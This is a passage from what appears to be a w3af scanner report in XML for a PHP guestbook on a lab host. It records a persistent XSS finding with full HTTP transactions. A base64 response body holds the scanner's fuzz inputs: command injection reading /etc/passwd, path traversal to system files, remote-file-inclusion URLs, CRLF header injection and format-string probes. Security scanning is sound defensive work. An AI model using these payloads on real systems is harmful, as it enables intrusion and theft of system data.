                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[253, 295, 353]" method="GET" name="Unidentified vulnerability" plugin="generic" severity="Medium" url="http://10.12.68.43:31337/" var="token">
        <description>An unidentified vulnerability was found at: &quot;http://10.12.68.43:31337/&quot;, using HTTP method GET. The modified parameter was the URL filename, with value: &quot;&quot;.</description>
        <http-transactions>
            <http-transaction id="253">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;Type your pseudonyme and message!&lt;/p&gt;
    &lt;form action='/post' method='post'&gt;
        &lt;input type='text' name='pseudo' /&gt;
        &lt;input type='textarea' name='message' /&gt;
        &lt;input type='submit' value='ok' /&gt;
    &lt;/form&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="295">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/4nV4dSKX HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="353">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;p&gt;&lt;a href='/post'&gt;leave a message!&lt;/a&gt;&lt;/p&gt;
    &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;beautiful website!&lt;/p&gt;
        &lt;hr /&gt;
        &lt;p&gt;manny&lt;/p&gt;
        &lt;p&gt;i've got nothing else to do&lt;/p&gt;
        &lt;hr /&gt;
</body>
                </httpresponse>
            </http-transaction>
        </http-transactions>
    </vulnerability>
    <vulnerability id="[782, 1175]" method="POST" name="Persistent Cross-Site Scripting vulnerability" plugin="xss" severity="High" url="http://10.12.68.43:31337/post" var="pseudo">
        <description>A persistent Cross Site Scripting vulnerability was found by sending &quot;fo45z&lt;/-&gt;&quot; to the &quot;pseudo&quot; parameter at http://10.12.68.43:31337/post, which is echoed when browsing to http://10.12.68.43:31337/.</description>
        <http-transactions>
            <http-transaction id="782">
                <httprequest>
                    <status>POST http://10.12.68.43:31337/post HTTP/1.1</status>
                    <headers>
                        <header content="44" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz1mbzQ1eiUzQyUyRi0lM0U=
</body>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">Message added successfullygo back to &lt;a href='/'&gt;messages&lt;/a&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="1175">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 200 OK</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="base64">ICAgIDxwPjxhIGhyZWY9Jy9wb3N0Jz5sZWF2ZSBhIG1lc3NhZ2UhPC9hPjwvcD4KICAgIDxociAv
PgogICAgICAgIDxwPm1hbm55PC9wPgogICAgICAgIDxwPmJlYXV0aWZ1bCB3ZWJzaXRlITwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD5tYW5ueTwvcD4KICAgICAgICA8cD5pJ3ZlIGdvdCBu
b3RoaW5nIGVsc2UgdG8gZG88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+PC9wPgogICAg
ICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5SZXNwb25zZS5Xcml0
ZShuZXcgU3RyaW5nPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPlJlc3BvbnNlLldyaXRlKG5ldyBTdHJpbmco
Inp6cnBuIiw1KSk8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9w
YXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+NTY8L3A+CiAgICAgICAgPHA+L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+dHlwZSAlU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxw
PkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAg
IDxwPnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD4mJi9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiYmL2Jpbi9jYXQgL2V0
Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+JiZ0eXBlICVTWVNURU1ST09U
JXdpbi5pbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD41NjwvcD4KICAgICAgICA8cD4mJnR5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD58L2Jpbi9jYXQgL2V0Yy9wYXNzd2Q8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+fC9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPnx0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+fHR5cGUgJVNZ
U1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD47L2Jpbi9jYXQg
L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+Oy9iaW4vY2F0IC9ldGMvcGFzc3dkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjt0eXBlICVTWVNURU1ST09UJXdpbi5pbmk8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+O3R5cGUgJVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD5gL2Jpbi9jYXQgL2V0Yy9wYXNzd2RgPC9wPgogICAgICAgIDxwPkhlbGxvIFdv
cmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmAvYmlu
L2NhdCAvZXRjL3Bhc3N3ZGA8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cnVuIHR5cGUg
JVNZU1RFTVJPT1Qld2luLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5ydW4gdHlwZSAlU1lTVEVNUk9PVCV3
aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjk4MjkzOTAwPC9wPgogICAgICAg
IDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnBvc3Q8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+cG9zdDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4uLi8uLi8u
Li8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkADwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAg
ICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgog
ICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0
Yy9wYXNzd2QALmh0bWw8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+L2V0Yy9wYXNzd2Q8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+L2V0Yy9wYXNz
d2Q8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+L2V0Yy9wYXNzd2QAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi9ldGMvcGFzc3dkADwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8cD5IZWxs
byBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8u
Li8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4u
Ly4uLy4uLy4uLy4uL2Jvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41Njwv
cD4KICAgICAgICA8cD4vZXRjL3Bhc3N3ZAAuaHRtbDwvcD4KICAgICAgICA8aHIgLz4KICAgICAg
ICA8cD4uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxk
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPi4uLy4uLy4u
Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2Jvb3QuaW5pAC5odG1sPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPkM6CG9vdC5pbmk8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+QzoI
b290LmluaTwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5DOghvb3QuaW5pADwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5DOghv
b3QuaW5pAC5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkM6CG9vdC5pbmkALmh0bWw8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaTwvcD4KICAgICAgICA8cD5I
ZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD4lU1lTVEVNUk9PVCV3aW4uaW5pPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNU
RU1ST09UJXdpbi5pbmkAPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkA
PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiVTWVNURU1ST09UJXdpbi5pbmkALmh0bWw8
L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+
NTY8L3A+CiAgICAgICAgPHA+JVNZU1RFTVJPT1Qld2luLmluaQAuaHRtbDwvcD4KICAgICAgICA8
aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAg
ICA8aHIgLz4KICAgICAgICA8cD4yMjcxOTA1NDwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAgPHA+SGVsbG8gV29y
bGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+cGluZyAtbiA0IGxvY2FsaG9zdDwv
cD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5h
KS8pLykvKS8pLykvKS8pLykvKS8pLykvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmEpLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8p
LykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykvKS8pLykv
KS8pLykvKS8pLykvKS8pLzwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD4zODF1MUs3MzwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5oVHRwOi8v
dzNhZi5vcmcvPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgog
ICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPmhUdHA6Ly93M2FmLm9yZy88L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+aHRUcHM6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPHA+SGVsbG8g
V29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aHRU
cHM6Ly93M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAg
ICAgPHA+ZlRwOi8vdzNhZi5vcmcvPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmZUcDov
L3czYWYub3JnLzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4K
ICAgICAgICA8cD4lbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbjwvcD4KICAgICAgICA8aHIgLz4KICAg
ICAgICA8cD4lbiVuJW4lbiVuJW4lbiVuJW4lbjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4lbiVuJW4lbiVu
JW4lbiVuJW4lbjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8
cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAv
PgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuPC9wPgogICAgICAgIDxociAvPgogICAgICAg
IDxwPiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+JW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4l
biVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVuJW4lbiVu
JW4lbiVuJW4lbiVuJW4lbiVuJW48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+XigjJCFA
IyQpKCgpKSkqKioqKio8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhy
IC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+XigjJCFAIyQpKCgpKSkqKioqKio8L3A+
CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+aHR0cDovL3d3dy53
M2FmLm9yZy88L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+aHR0cDovL3d3dy53M2FmLm9y
Zy88L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAg
PHA+Ly93M2FmLm9yZzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIg
Lz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD4vL3czYWYub3JnPC9wPgogICAgICAgIDxo
ciAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAg
IDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAg
ICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPm5scTdCcDhZPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjwhLS08L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+PCEtLTwvcD4K
ICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwv
cD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAgICAgICA8cD5IZWxsbyBXb3Js
ZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD5waW5nIC1jIDQgbG9jYWxob3N0PC9wPgog
ICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPiI8L3A+
CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8
L3A+CiAgICAgICAgPHA+IjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4KICAg
ICAgICA8cD48L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+aURvbnRFeGlzdDwvcD4KICAg
ICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD41NjwvcD4K
ICAgICAgICA8cD5pRG9udEV4aXN0PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9w
PgogICAgICAgIDxwPjwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8cD48L3A+CiAgICAgICAg
PHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+Zm80NXo8Ly0+PC9w
PgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmNq
cDh2Lyo8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAg
ICAgPHA+eXVqbXRgeXVqbXQ8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAg
PGhyIC8+CiAgICAgICAgPHA+bGd6YmQibGd6YmQ8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8
L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAgICAgIDxwPkhl
bGxvIFdvcmxkPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnZ4dzFuID08L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+
CiAgICAgICAgPHA+c2xlZXAoMyk7PC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnczYWYN
CnZ1bG5lcmFibGUwNzNiOiBhZTU8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAg
ICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dzNhZg0KdnVsbmVyYWJsZTA3
M2I6IGFlNWN3M2FmPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPnczYWYNdnVsbmVyYWJs
ZTA3M2I6IGFlNWM8L3A+CiAgICAgICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+
CiAgICAgICAgPHA+NTY8L3A+CiAgICAgICAgPHA+dzNhZg12dWxuZXJhYmxlMDczYjogYWU1Y3cz
YWY8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+dzNhZgp2dWxuZXJhYmxlMDczYjogYWU1
YzwvcD4KICAgICAgICA8cD5IZWxsbyBXb3JsZDwvcD4KICAgICAgICA8aHIgLz4KICAgICAgICA8
cD41NjwvcD4KICAgICAgICA8cD53M2FmCnZ1bG5lcmFibGUwNzNiOiBhZTVjdzNhZjwvcD4KICAg
ICAgICA8aHIgLz4KICAgICAgICA8cD5odHRwOi8vdzNhZi5vcmcvcmZpLmh0bWw8L3A+CiAgICAg
ICAgPHA+SGVsbG8gV29ybGQ8L3A+CiAgICAgICAgPGhyIC8+CiAgICAgICAgPHA+NTY8L3A+CiAg
ICAgICAgPHA+aHR0cDovL3czYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxociAvPgogICAg
ICAgIDxwPnczYWYub3JnL3JmaS5odG1sPC9wPgogICAgICAgIDxwPkhlbGxvIFdvcmxkPC9wPgog
ICAgICAgIDxociAvPgogICAgICAgIDxwPjU2PC9wPgogICAgICAgIDxwPnczYWYub3JnL3JmaS5o
dG1sPC9wPgogICAgICAgIDxociAvPgogICAgICAgIDxwPmhUdFA6Ly93M2FmLm9yZy9yZmkuaHRt
